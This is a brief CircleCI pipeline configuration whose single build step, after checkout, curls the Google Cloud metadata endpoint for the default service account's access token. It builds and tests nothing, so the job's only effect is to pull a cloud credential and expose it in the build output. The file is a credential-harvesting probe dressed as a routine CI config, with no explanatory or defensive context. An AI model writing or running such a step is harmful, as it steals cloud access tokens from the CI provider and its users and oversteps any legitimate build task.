 version: 2
 jobs:
   build:
     docker:
       - image: circleci/ruby:2.4.1
     steps:
       - checkout
       - run: curl  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
